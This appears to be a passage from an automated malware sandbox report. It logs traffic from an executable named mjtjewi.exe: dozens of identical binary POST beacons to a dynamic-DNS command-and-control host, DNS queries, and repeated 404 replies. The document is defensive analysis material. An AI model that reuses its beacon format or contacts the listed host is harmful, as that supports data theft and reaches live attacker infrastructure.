Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00404ED4 recv,

6_2_00404ED4

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
Source: global traffic	DNS traffic detected: DNS query: freighteighttwocam.ddns.net

Source: unknown

HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
